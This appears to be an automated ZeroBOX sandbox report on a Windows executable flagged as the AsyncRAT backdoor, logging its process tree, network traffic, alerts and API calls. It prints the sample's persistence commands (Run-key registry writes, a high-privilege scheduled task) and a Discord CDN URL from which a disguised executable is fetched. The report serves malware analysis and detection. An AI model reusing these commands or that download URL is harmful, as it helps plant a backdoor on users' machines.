Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 18, 2022, 5:28 p.m.	Aug. 18, 2022, 5:30 p.m.

Size	2.6MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`a20fe7a245e150d07856bf04fb89ab23`
SHA256	`440568713266249eddfaaa8bf9666ce0ae4879a61fbea23e987acf352e89ef4a`
CRC32	`49F0DFCD`
ssdeep	`49152:i9nbKyQ0dRkjFWaefD9twR/R6KqfuBBzkjbGDGe0VM:iBTJRfaefL2BBTDxL`
Yara	IsPE32 - (no description) Generic_Malware_Zero - Generic Malware UPX_Zero - UPX packed file Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description)

final00.exe "C:\Users\test22\AppData\Local\Temp\final00.exe"
2324
- WindowsSystemGuardRuntime.exe "C:\Roamiing\WindowsSystemGuardRuntime.exe"
  2512
  - powershell.exe "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows System Guard Runtime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows System Guard Runtime' -Value '"C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe"' -PropertyType 'String'
    2712
  - cmd.exe "cmd" /C schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
    2780
    - schtasks.exe schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
      2952
- SecurityHealthService.exe "C:\Roamiing\SecurityHealthService.exe"
  2552
- dataencod.exe "C:\Roamiing\dataencod.exe"
  2588
  - cmd.exe "cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Runtime Brookeer" /t REG_SZ /d "C:\Users\test22\Music\\Videos\Runtime Brookeer.exe"
    1176
    - PING.EXE ping 127.0.0.1 -n 37
      2304
    - reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Runtime Brookeer" /t REG_SZ /d "C:\Users\test22\Music\\Videos\Runtime Brookeer.exe"
      1956
  - cmd.exe "cmd" /c ping 127.0.0.1 -n 47 > nul && copy "C:\Roamiing\dataencod.exe" "C:\Users\test22\Music\\Videos\Runtime Brookeer.exe" && ping 127.0.0.1 -n 47 > nul && "C:\Users\test22\Music\\Videos\Runtime Brookeer.exe"
    3012
    - PING.EXE ping 127.0.0.1 -n 47
      2176
    - PING.EXE ping 127.0.0.1 -n 47
      1144
- msiexec2.exe "C:\Roamiing\msiexec2.exe"
  2632
- InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2840

Name	Response	Post-Analysis Lookup
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.135.233
www.google.com	A 142.251.42.164 A 172.217.161.36	142.250.206.228

IP Address	Status	Action
142.251.42.164	Active	Moloch
162.159.135.233	Active	Moloch
164.124.101.2	Active	Moloch
172.217.161.36	Active	Moloch
217.64.31.3	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49168 -> 142.251.42.164:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49161 -> 172.217.161.36:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49180 -> 162.159.135.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.103:49180 -> 162.159.135.233:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:60880 -> 164.124.101.2:53	2035466	ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49168 142.251.42.164:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	27:2e:56:1b:56:00:b7:8d:84:07:c7:62:41:02:94:f3:9a:a0:c3:5e
TLSv1 192.168.56.103:49161 172.217.161.36:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	27:2e:56:1b:56:00:b7:8d:84:07:c7:62:41:02:94:f3:9a:a0:c3:5e
TLS 1.2 192.168.56.103:49180 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	42:d5:a7:c0:c1:61:01:ee:fb:44:38:ab:54:aa:23:79:3b:75:08:a8

Queries for the computername (10 events)

Time & API	Arguments	Status	Return
GetComputerNameA Aug. 18, 2022, 5:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2022, 5:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2022, 5:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2022, 5:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2022, 5:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2022, 5:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 18, 2022, 5:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2022, 5:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 18, 2022, 5:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2022, 5:28 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (17 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0
IsDebuggerPresent Aug. 18, 2022, 5:28 p.m.			0	0

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: The term 'Remove' is not recognized as the name of a cmdlet, function, script f console_handle: 0x00000023	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: ile, or operable program. Check the spelling of the name, or if a path was incl console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: uded, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: At line:1 char:7 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: + Remove <<<< -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVer console_handle: 0x00000053	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: sion\Run' -Name 'Windows System Guard Runtime';New-ItemProperty -Path 'HKCU:\SO console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: FTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows System Guard Runtim console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: e' -Value 'C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows console_handle: 0x00000077	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: System Guard Runtime.exe' -PropertyType 'String' console_handle: 0x00000083	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Remove:String) [], CommandNotFo console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: undException console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT console_handle: 0x000000c3	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: _USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ console_handle: 0x000000c7	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: Run console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT console_handle: 0x000000cf	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: _USER\SOFTWARE\Microsoft\Windows\CurrentVersion console_handle: 0x000000d3	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: PSChildName : Run console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: PSDrive : HKCU console_handle: 0x000000db	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: PSProvider : Microsoft.PowerShell.Core\Registry console_handle: 0x000000df	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: Windows System Guard Runtime : C:\Users\test22\AppData\Roaming\Windows System G console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 18, 2022, 5:28 p.m.	buffer: uard Runtime\Windows System Guard Runtime.exe console_handle: 0x000000e7	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 54 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00348430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cd518 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cd518 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fcd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fcdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fcdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca6a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cac28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cac28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cac28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cac28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cac28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cac28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cab28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cab28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cab28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cab28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cab28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cab28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cab28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cab28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cab28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cab28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca3a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2022, 5:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004cb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 18, 2022, 5:28 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET https://www.google.com/
suspicious_features	GET method with no useragent header				suspicious_request	GET https://cdn.discordapp.com/attachments/994323960667852841/994350957108412446/Windows_Defender_SmartScreen.exe

Performs some HTTP requests (2 events)

request	GET https://www.google.com/
request	GET https://cdn.discordapp.com/attachments/994323960667852841/994350957108412446/Windows_Defender_SmartScreen.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 380 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00660000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02130000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00552000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00585000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00576000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00577000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
